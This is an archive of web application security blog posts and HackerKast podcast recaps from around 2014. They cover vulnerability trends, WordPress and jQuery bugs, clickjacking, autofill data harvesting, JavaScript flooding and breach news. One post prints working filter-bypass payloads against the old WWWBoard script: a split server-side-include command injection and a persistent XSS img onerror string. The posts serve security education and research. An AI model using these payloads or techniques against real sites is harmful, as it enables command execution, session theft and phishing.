Category Archives: Web Application Security

The Parabola of Reported WebAppSec Vulnerabilities

The nice folks over at Risk Based Security’s VulnDB gave me access to take a look at their extensive collection of vulnerabilities that they have collected over the years. As you can probably imagine, I was primarily interested in their remotely exploitable web application issues.

Looking at the data, the immediate thing I notice is the nice upward trend as the web began to really take off, and then the real birth of web application vulnerabilities in the mid 2000’s. However, one thing I found that struck me as very odd was that we’re starting to see a downward trend in web application vulnerabilities since 2008.

  • 2014 – 1607 [as of August 27th]
  • 2013 – 2106
  • 2012 – 2965
  • 2011 – 2427
  • 2010 – 2554
  • 2009 – 3101
  • 2008 – 4615
  • 2007 – 3212
  • 2006 – 4167
  • 2005 – 2095
  • 2004 – 1152
  • 2003 – 631
  • 2002 – 563
  • 2001 – 242
  • 2000 – 208
  • 1999 – 91
  • 1998 – 25
  • 1997 – 21
  • 1996 – 7
  • 1995 – 11
  • 1994 – 8

Assuming we aren’t seeing a downward trend in total compromises (which I don’t think we are) here are the reasons I think this could be happening:

  1. Code quality is increasing: It could be that we saw a huge increase in code quality over the last few years. This could be coming from compliance initiatives, better reporting of vulnerabilities, better training, source code scanning, manual code review, or any number of other places.
  2. A more homogenous Internet: It could be that people are using fewer and fewer new pieces of code. As code matures, people who use it are less likely to switch in favor of something new, which means there are fewer threats to the incumbent code to be replaced, and it’s therefore more likely that new frameworks won’t get adopted. Software like WordPress, Joomla, or Drupal will likely take over more and more consumer publishing needs moving forward. All of the major Content Management Systems (CMS) have been heavily tested, and most have developed formal security response teams to address vulnerabilities. Even as they get tested more in the future, such platforms are likely a much safer alternative than anything else, therefore obviating the need for new players.
  3. Attacks may be moving towards custom web applications: We may be seeing a change in attacker tactics, where they are focusing on custom web application code (e.g. your local bank, Paypal, Facebook), rather than open source code used by many websites. That means they wouldn’t be reported in data like this, as vulnerability databases do not track site-specific vulnerabilities. The sites that do track such incidents are very incomplete for a variety of reasons.
  4. People are disclosing fewer vulns: This is always a possibility when the ecosystem evolves far enough where reporting vulnerabilities is more annoying to researchers, provides them fewer benefits, and ultimately makes their life more difficult than working with the vendors directly or holding onto their vulnerabilities. The presence of more bug bounties, where researchers get paid for disclosing their newly found vulnerability directly to the vendor, is one example of an influence that may affect such statistics.

Whatever the case, this is is an interesting trend and should be watched carefully. It could be a hybrid of a number of these issues as well, and we may never know for sure. But we should be aware of the data, because in it might hide some clues on how to further decrease the numbers. Another tidbit that is not expressed in the data above shows that there were 11,094 vulnerabilities disclosed in 2013, of which 6,122 were “web related” (meaning web application or web browser). While only 2,106 may be remotely exploitable (meaning it involves a remote attacker and there is published exploit code) context-dependent attacks (e.g. tricking a user to click a malicious link) are still a leading source of compromise at least amongst targeted attacks. While vulnerability disclosure trends may be going down, organizational compromises appear to be just as common or even more so than they have ever been. Said another way, compromises are flat or even up, and new remotely exploitable web application vulnerabilities being disclosed is down. Very interesting.

Thanks again to the Cyber Risk Analytics VulnDB guys for letting me play with their data.

#HackerKast 13: Zombie POODLE, TCP/UDP Vulnerabilities, Jailed for XSS

This week Robert was keeping warm by his yule log while Jeremiah was freezing in the Boston snow and I won’t be putting Christmas ornaments in my beard no matter how many of you send me that blog post. To get right into it, we started off by talking about the return of POODLE. For those with short term memory loss, POODLE was a nasty vulnerability disclosed a few weeks back that affected SSL v3 which is: a) already widespread as-is and, b) easy to downgrade somebody’s browser to use. The zombie POODLE this week didn’t go after SSL this time and instead went after TLS 1.2 which is used *everywhere*. The most prominent place that will need patching is all F5 load balancers which are using this version of TLS – and that happens to be most of them. Sorry for all of you who lost sleep a few weeks ago because it is about to happen again this week. Happy Holidays!

Next, if you recall a topic from last week’s episode regarding Google’s alternative to CAPTCHA, well it appears Robert may be getting a Christmas wish early, and it didn’t take long. Before any of us had ever seen it in the wild, Google’s new solution to replace CAPTCHAs was found to be very easily avoidable. The check-box that is supposed to tell if you are a human or a robot turns out to fail back to a normal CAPTCHA which is nothing new. If that wasn’t useless enough, it actually introduces a new weakness that didn’t exist before! This check-box is clickjackable! You can gather tons of valid tokens that say you are a human and load them into your botnet or whatever you’d like.

Now buckle up and put your splash guards on because this next story blew our minds. A new proposal for the HTTP spec has popped up that would allow a browser to… wait for it… make TCP/UDP requests! Yup, you heard it. We had TCP/UDP and said: “Hey, let’s abstract a layer on top of that, and we’ll call it HTTP.” Now, fast forward to this month and we are saying: “Hey remember TCP/UDP? Lets put that on top of HTTP!” I’m picturing Dory from finding Nemo here. This opens tons of doors to all sorts of attacks behind a firewall via a web browser. Watch the video for a list of ideas that might be possible if this is implemented from Robert and I.

Lastly, we have a weird and sad story about somebody ending up in jail for a web “hack.” In Singapore, some unlucky fellow decided to poke around on their prime minister’s website. The website had a Google search bar embedded in it which seemed to tie into some reflection of that text which was unsanitized and therefore vulnerable to XSS. This led him to get a laugh out of it and craft a link with the reflective XSS in it and send it around which showed the prime minister’s site displaying a Guy Fawkes mask in reference to Anonymous. The thing with this though is that the site wasn’t actually defaced and no breach actually occurred. That didn’t stop the local authorities from sending this guy to jail for six months and fining him the equivalent of $34,000. As far as we know this is the first person since Samy on Myspace (who is my hero) who landed in jail due to XSS.

Keep an eye out for some Bonus Footage this week where Robert and I dig into some JavaScript Flooding attacks with an easy demo!

Resources:
POODLE back to bite TLS connections
The No CAPTCHA Problem
TCP and UDP Socket API
Singapore Hacker Jailed for XSS on Prime Minister’s Office Website

#HackerKast 13 Bonus Round: FlashFlood – JavaScript DoS

In this week’s HackerKast bonus footage, I wrote a little prototype demonstrator script that shows various concepts regarding JavaScript flooding. I’ve run into the problem before where people seem to not understand how this works, or even that it’s possible to do this, despite multiple attempts at trying to explain it over the years. So, it’s demo time! This is not at all designed to take down a website by itself, though it could add extra strain on the system.

What you might find though, is that heavy database driven sites will start to falter if they rely on caching to protect themselves. Specifically Drupal sites tend to be fairly prone to this issue because of how Drupal is constructed, as an example.

It works by sending tons of HTTP requests using different paramater value pairs each time, to bypass caching servers like Varnish. Ultimately it’s not a good idea to ever use this kind of code as an adversary because it would be flooding from their own IP address. So instead this is much more likely to be used by an adversary who tricks a large swath of people into executing the code. And as Matt points out in the video, it’s probably going to end up in XSS code at some point.

Anyway, check out the code here. Thoughts are welcome, but hopefully this makes some of the concepts a lot more clear than our previous attempts.

Infancy of Code Vulnerabilities

I was reading something about modern browser behavior and it occurred to me that I hadn’t once looked at Matt’s Script Archive from the mid 1990s until now. I kind of like looking at old projects through the modern lens of hacking knowledge. What if we applied some of the modern day knowledge about web application security against 20-year-old tech? So I took at look at the web-board. According to Google there are still thousands of installs of WWWBoard lying around the web:

http://www.scriptarchive.com/download.cgi?s=wwwboard&c=txt&f=wwwboard.pl

I was a little disappointed to see the following bit of text. It appears someone had beat me to the punch – 18 years ago!

# Changes based in part on information contained in BugTraq archives
# message 'WWWBoard Vulnerability' posted by Samuel Sparling Nov-09-1998.
# Also requires that each followup number is in fact a number, to
# prevent message clobbering.

In taking a quick look there have been a number of vulns found in it over the years. Four CVEs in all. But I decided to take a look at the code anyway. Who knows – perhaps some vulnerabilities have been found but others haven’t. After all, this has been nearly 12 years since the last CVE was announced.

Sure enough its actually got some really vulnerable tidbits in it:

# Remove any NULL characters, Server Side Includes
$value =~ s/\0//g;
$value =~ s/<!--(.|\n)*-->//g;

The null removal is good, because there’s all kinds of ways to sneak things by Perl regex if you allow nulls. But that second string makes me shudder a bit. This code intentionally blocks typical SSI like:

<!--#exec cmd="ls -al" -->

But what if we break up the code? We’ve done this before for other things – like XSS where filters prevented parts of the exploit so you had to break it up into two chunks to be executed together once the page is re-assembled. But we’ve never (to my knowledge) talked about doing that for SSI! What if we slice it up into it’s required components where:

Subject is: <!--#exec cmd="ls -al" echo='
Body is: ' -->

That would effectively run SSI code. Full command execution! Thankfully SSI is all but dead these days not to mention Matt’s project is on it’s deathbed, so the real risk is negligible. Now let’s look a little lower:

$value =~ s/<([^>]|\n)*>//g;

This attempts to block any XSS. Ironically it should also block SSI, but let’s not get into the specifics here too much. It suffers from a similar issue.

Body is: <img src="" onerror='alert("XSS");'

Unlike SSI I don’t have to worry about there being a closing comment tag – end angle brackets are a dime a dozen on any HTML page, which means that no matter what this persistent XSS will fire on the page in question. While not as good as full command execution, it does work on modern browser more reliably than SSI does on websites.

As I kept looking I found all kinds of other issues that would lead the board to get spammed like crazy, and in practice when I went hunting for the board on the Internet all I could find were either heavily modified boards that were password protected, or broken boards. That’s probably the only reason those thousands of boards aren’t fully compromised.

It’s an interesting reminder of exactly where we have come from and why things are so broken. We’ve inherited a lot of code, and even I still have snippets of Matt’s code buried in places all over the web in long forgotten but still functional code. We’ve inherited a lot of vulnerabilities and our knowledge has substantially increased. It’s really fascinating to see how bad things really were though, and how little security there really was when the web was in it’s infancy.

#HackerKast 12: Operation Cleaver, Sony and PayPal Hacks, Google’s Alternative to CAPTCHA

Kicked this week off in the holiday spirit with Robert and Jeremiah hanging out in a festive hotel down in Los Angeles, probably preparing to cause lots of trouble. The first story we touched on was about Operation Cleaver, a report put out by Cylance. This research investigates the movements and threat of one particular pro-Iranian hacking group who was targeting airports and transportation systems across 16 countries. The claim is that this group has “attained the highest level of system access” across all the countries targeted. The reason us web nerds are interested is that the main front door used to start these hacks is pointing towards SQL injection.

Next, we had to do it: we simply couldn’t get away with a HackerKast without talking about Sony. This hack is bad. Bad for a lot of people and as Jeremiah points out, there is a real human aspect to this. Tons of real people’s information has been leaked that will cause a lot of pain. So far, 40GB of a claimed 100TB that was stolen is now leaked and available on the Internet via torrents. Robert brings up a good point that due to the business that Sony does, moving around Terabytes of data probably isn’t an alarm-ringing event. Another great point we discussed is that this hack required insider access. Even though the end result was bad, this does point to the fact that Sony is probably doing a pretty good job on their exterior security otherwise the attackers would’ve taken the path of least resistance there.

Can we get through an episode without talking about a WordPress vulnerability? Please? Anyway, we have another one this week that affects 850,000 WordPress sites. The culprit this time is the WordPress Download Manager which is extremely popular. This plugin is vulnerable to a very blatant Remote Code Execution via a simple POST request. An attacker can craft an HTTP POST request with some PHP code and it gets immediately executed on the server. This would lead to absolute and full compromise of the server running this plugin. Do I even need to mention that the vulnerable function has the names “ajax_exec” in it?

Robert then took a look at a nasty PayPal hack that was put out by an Egyptian researcher this week. The clever attack outlined here utilized a CSRF vulnerability to bypass protections in place to change a user’s password reset security questions. These security questions are a soft spot in a lot of web applications since they are just as good as a password to get into an account since if answered correctly you can just make your own password. The reason CSRF is so bad on this functionality is because an attacker can force an authenticated user’s browser to reset these questions unbeknownst to them. I then sat back for a moment and let Jeremiah and Robert reminisce about the good ole days when dinosaurs roamed the internet and CSRF wasn’t even considered a vulnerability.

Finally, we talked a bit about the new Google gadget recently released which is a bold new alternative to the ever-annoying CAPTCHA. Instead of entering some mess of garbled text, Google is claiming it can detect the difference between a bot and a human with just one click of a checkbox. Robert got visibly angered by this idea (ok maybe not, but he really doesn’t like it). He does admit that today this idea will work well due to the current heuristics in place of detecting a human. Things like mouse movements, time to click the button, etc., are key pieces of information that differentiate real from fake traffic and have been important to Google for the sake of detecting Ad Fraud for years. The problem lies in that this has now been released publicly for any attacker to fuzz this and defeat the heuristics. The rest of the problems with this probably deserve a separate blog post but to put a bow on it, what Robert is suggesting is that this is now going to raise the bar necessary for bot sophistication. Along with this boost in sophistication comes the fact that it will break the ability of non-Google-level heuristics to keep up.

That’s a wrap this week, hope you enjoy watching as much as we enjoy making these episodes!

Resources:
Security Advisory – High Severity– WordPress Download Manager
Hacking PayPal Account with Just a Click
Are you a robot? Introducing ‘No CAPTCHA reCAPTCHA’
Critical networks in US, 15 other nations, completely owned, possibly by Iran
Cylance: Operation Cleaver Report
Why Sony’s Plan to Foil PlayStation-Type Attacks Faltered

#HackerKast 11 Bonus Round: The Latest with Clickjacking!

This week Jeremiah said it was my turn to do a little demo for our bonus video. So I went back and I decided to take a look at how Adobe had handled clickjacking in various browsers. My understanding was that they had done two things to prevent users from getting access to the camera and microphone. The first was that they wouldn’t allow you to make it a 1×1 pixel iframe that otherwise hid the permissions dialog.

My second understanding was that they prevented the browser from changing the opacity of the flash movie or surrounding iframe so that the dialog wasn’t obscured from view. So I decided to try it out!

It turns out that hiding it from view using opacity is still allowed in Chrome. Chrome has chosen to use a permissions dialog to prevent the user from being duped, that comes down from the ribbon. That is a fairly good defense. I would even argue that there is nothing exploitable here. But just because something isn’t exploitable doesn’t mean it’s clear to the user what’s going on so I decided to take a look at how I would social engineer someone into giving me access to their camera and microphone.

So I created a small script that pops open the victim domain (say https://www.google.com/) so that the user can look at the URL bar and see that they are indeed on the correct domain. Popups have long been banned but only automatic ones, the ones that are user initiated are still allowed and “pop” up into an adjacent tab. Because I still have a reference to the popup window from the parent I can can easily send it somewhere else, other than Google after some time elapses.

At this point I send it to a data: URL structure, that allows me to inject data onto the page. Using a little trick to make the browser look an awful lot like they’re still on Google makes this trick super useful for phishing and other social engineering attacks, but not necessarily a vuln either. This basically claims that the charset is “https://www.google.com/” followed by a bunch of spaces, instead of “utf8″ or whatever it would normally be. That makes it look an awful lot like you’re still on Google’s site, but you are in fact seeing content from ha.ckers.org. So yeah, imagine that being a login page instead of a clickjacking page and you’ve got a good idea how an attacker would be most likely to use it.

At that point the user is presented with a semi-opaque Flash movie and asked to click twice (once to instantiate the plugin and once to allow permissions). Typically if I were really doing this I would host it on a domain like “gcams.com” or “g-camz.com” or whatever so that the dialog would look like it’s trying to include content from a related domain.

The user is far more likely to allow Google to have access to the user’s camera and microphone than ha.ckers.org, of course, and this problem is exacerbated by the fact that people are accustomed to sites including tons of other domains and sub-domains of other companies and subsidiaries. In Google’s case, googleusercontent.com, gstatic.com etc… are all such places that people have come to recognize and trust as being part of Google, but the same is true with lots of domains out there.

Anyway, yes, this is probably not a vuln, and after talking with Adobe and Chrome they agree, so don’t expect any sort of fixes from what I can gather. This is just how it works. If you want to check it out you can click here with Chrome to try the demo. I hope you enjoyed the bonus video!

Resources:
Wikipedia: Clickjacking

#HackerKast 11: WordPress XSS Vuln, $90 PlayStation 4s and CryptoPHP Backdoor

Happy Late Thanksgiving everybody! We started out this week going around talking about how thankful we are about browser insecurity, web application security, and the Texas cold front.

First story we talked about was a new crazy widespread XSS vulnerability in a WordPress Statistics “plugin” (I put plugin in quotes here because as of September 90% of sites had this WP-Statistics plugin installed, and that is down now to about 86% at the time of this post). The commenting system here is vulnerable to XSS very blatantly which leads me to be confused on how this took so long to come to light.

The proof of concept the researchers associated with this blog post was very nasty as this is a persistent XSS vulnerability. An attacker can leave a comment on a blog post, as the admin of the WordPress blog goes to approve this comment the payload will then steal that admin’s session cookies and send them to the attacker. Other possibilities include changing the current admin password, adding a new admin account, or use the plugin editor to write your own malicious PHP code and execute it instantly.

Next, we spoke about a clever less-technical business logic hack against Walmart. People were taking advantage of Walmart’s price matching clause by actually standing up fake manufacturers with lower prices. These pages would look legitimate enough but were in no way actual retailers. The most widespread use of this that caught the attention of the right folks was that people were getting PlayStation4s for $90. Robert was very upset about the fact that he heard about this after Walmart tightened their security controls.

Robert then gave us an overview of a new backdoor malware that is taking advantage of common blog plugins. These hackers were creating legitimate looking add-ons by creating near-exact mirrors of WordPress, Joomla, Drupal, etc,. plugins/themes. The attack itself is a combination of phishing and malware where they would with trick the admin of these blogs to install these near-mirror copies of the plugins with the addition of a backdoor called CryptoPHP. The solution to this is a hard age-old problem of where/who to trust a download of any sort of this code you are going to execute install.

Lastly, Jeremiah didn’t shy away from some shameless self promotion of a blog that we put out about the characteristics of what makes an attack “sophisticated.” This is an interesting blood-boiling topic for a few of us who have been around for a while. We see these press releases come out all the time that claim a recent breach was caused by a “sophisticated attack” later to find out that it was a plain vanilla SQL Injection. Jeremiah decided to step up and try to define what is needed to actually claim a sophisticated attack. This is by no means a complete list but certainly a start to which we welcome any and all feedback.

This week’s bonus footage comes from Robert who walked us through some cool research around clickjacking. Check it out!

Resources:
CryptoPHP Backdoor Hijacks Servers with Malicious Plugins and Themes
Scam Tricks Walmart into Selling $90 PS4s
Death by Comments: WordPress XSS Vuln is Biggest in Years
5 Characteristics of a ‘Sophisticated Attack’

#HackerKast 10 Bonus Round: Live Hack of Browser AutoComplete Function

While we were all recording HackerKast Episode 10 this week we decided to add a little bonus footage for a bit more technical content instead of just news stories. We mastered the power of Screensharing on our video chat and decided to put it to use.

This week’s bonus footage features Jeremiah diving into the world of browser Autocomplete hacking. This isn’t a new topic by any means but as us hackers get curious every once in a while, Jeremiah decided to see if this bug was still around.

The premise is simple: you can place a form on a website that you control. On that form you can ask for a user’s name. When you begin to type in that name, some browsers (Chrome & Safari featured in the video) will offer up the convenience of auto-filling the form for you. In this case the user doesn’t feel like typing their whole name out and allows the browser to do so. What the user doesn’t see is the rest of the form fields which are easily rendered invisible with simple CSS which are titled properly to grab the rest of the information out of your AutoFill contacts profile.

In the video Jeremiah shows how it is possible with a bit of tom foolery and Javascript to grab things like an unsuspecting user’s phone number, birthday, address, email, etc. just by having them starting to type in their name and letting AutoFill do the rest. This demo was done on Mac OSX using the latest versions of Safari and Chrome.

Again, not much new and revolutionary but still a scary attack that most users would fall for and be none the wiser as to what is going on.

We have posted the code to this particular hack on ha.ckers.org for anyone interested in testing it out.

Happy Hacking!

#HackerKast 10: XSS Vulnerability in jQuery, Let’s Encrypt, and Google Collects Personal Info

We kicked off this week’s episode chatting about a new XSS vulnerability that was uncovered in the very popular jQuery Validation Plugin. This plugin is used widely as a simple form validator and the researcher, Sijmen Ruwhof, found the bug in the plugin’s CAPTCHA implementation. This bug was very widespread, with a few Google dorks showing at least 12,000 websites easily identified as using it, and another 300,000 – 1 million websites potentially using it, or similar vulnerable code. The piece that was amusing for all of us about this story was that Ruwhof disclosed the bug privately to both the author and to jQuery back in August and received no response. After doing some digging the bug was already in OSVDB from 2013 with no action taken. After warning the plugin’s author and writing the blog post on the research publicly, the bug was closed within 17 hours. A nice little case study on Full Disclosure.

Next, Jeremiah covered the launch of new certificate authority called Let’s Encrypt. This kind of thing wouldn’t normally be news since there are a ton of CAs out there already but what makes Let’s Encrypt interesting is the fact that it is a non-profit, *FREE*, certificate authority. The project is backed by EFF, Mozilla, Cisco, Akamai, IdenTrust, and University of Michigan researchers and is focusing on being free and easy-to-use to reduce the barrier to entry of encrypting your web traffic. Robert brings up a good question of browser support, if Microsoft or Google doesn’t support this right away it really only helps the 20% or so of the users using Firefox. The other question here is what effect this will have on for-profit Certificate Authorities.

Now we of course had to mention the blog post that went somewhat viral recently about all the information Google is collecting about you. None of this was terribly surprising to many of us in this industry but was certainly eye-opening for a lot of people out there. You can easily look up their advertising profile on you, which was hilariously inaccurate for me and a few others who were posting their info online (contrary to popular belief I’m not into Reggaeton). However, the creepy one for me was the “Location History” which was *extremely* precise.

These 6 links hitting the blogosphere had good timing as Mozilla also announced that they will be switching the default search engine used in FireFox to be Yahoo. This is HUGE news considering somewhere upwards of 95% of Mozilla’s revenue comes from the fact that Google pays to be the default engine. FireFox also still has 20% market share of browser users all of whom will be using significantly less Google these days.

Robert also dug up a story about a recent ruling from a judge in the United States that said the police are allowed to compel people for any sort of biometric-based authentication but not password-based. For example, a judge has said it is perfectly legal for police to force you to use your fingerprint to unlock your iPhone but still not so for a four-digit-pin. This has all sorts of interesting implications when it comes to information security and personal privacy when it comes to law enforcement.

With absolutely no segway we covered a new story about China which seems to be one of Robert’s favorite topics. Turns out that China came out with a list of a ton of new websites they blocked from anybody accessing and one that stood out was Edgecast. Edgecast was particularly interesting because on it’s own it isn’t a website worth noting but they are a CDN which means China has blocked all of their customers as well which could affect hundreds of thousands of sites. The comparison was made of it being like blocking Akamai. Will be fascinating to see what the repercussions of this are as we go.

Closed out this week just chatting about some extra precautions we are all taking these days in the modern dangerous web. Listen in for a few tips!

Resources:
Cross-site scripting in millions of websites
Let’s Encrypt- It’s free, automated and open
6 links that will show you what Google knows about you
After this judge’s ruling, do you finally see value in passwords?
China just blocked thousands of websites

5 Characteristics of a ‘Sophisticated’ Attack

When news breaks about a cyber-attack, often the affected company will [ab]use the word ‘sophisticated’ to describe the attack. Immediately upon hearing the word ‘sophisticated,’ many in the InfoSec community roll their eyes because the characterization is viewed as nothing more than hyperbole. The skepticism stems from a long history of incidents in which breach details show that the attacker gained entry using painfully common, even routine, and ultimately defensible methods (e.g. SQL Injection, brute-force, phishing, password reuse, old and well-known vulnerability, etc).

In cases of spin, the PR team of the breached company uses the word ‘sophisticated’ in an to attempt convey that the company did nothing wrong, that there was nothing they could have done to prevent the breach because the attack was not foreseeable or preventable by traditional means, and that they “take security seriously,” — so please don’t sue, stop shopping, or close your accounts.

One factor that allows this deflection to continue is the lack of a documented consensus across InfoSec of what constitutes a ‘sophisticated’ attack. Clearly, some attacks are actually sophisticated – Stuxnet comes to mind in that regard. Not too long ago I took up the cause and asked my Twitter followers, many tens of thousands largely in the InfoSec community, what they considered to be a ‘sophisticated’ attack. The tweets received were fairly consistent. I distilled the thoughts down to set of attack characteristics and have listed them below.

5 Characteristics of a ‘Sophisticated’ Attack:

  1. The adversary knew specifically what application they were going to attack and collected intelligence about their target.
  2. The adversary used the gathered intelligence to attack specific points in their target, and not just a random system on the network.
  3. The adversary bypassed multiple layers of strong defense mechanisms, which may include intrusion prevention systems, encryption, multi-factor authentication, anti-virus software, air-gapped networks, and on and on.
  4. The adversary chained multiple exploits to achieve their full compromise. A zero-day may have been used during the attack, but this alone does not denote sophistication. There must be some clever or unique technique that was used.
  5. If malware was used in the attack, then it had to be malware that would not have been detectable using up-to-date anti-virus, payload recognition, or other endpoint security software.

While improvements can and will be made here, if an attack exhibits most or all of these characteristics, it can be safely considered ‘sophisticated.’ If it does not display these characteristics and your PR team still [ab]uses the word ‘sophisticated,’ then we reserve the right to roll our eyes and call you out.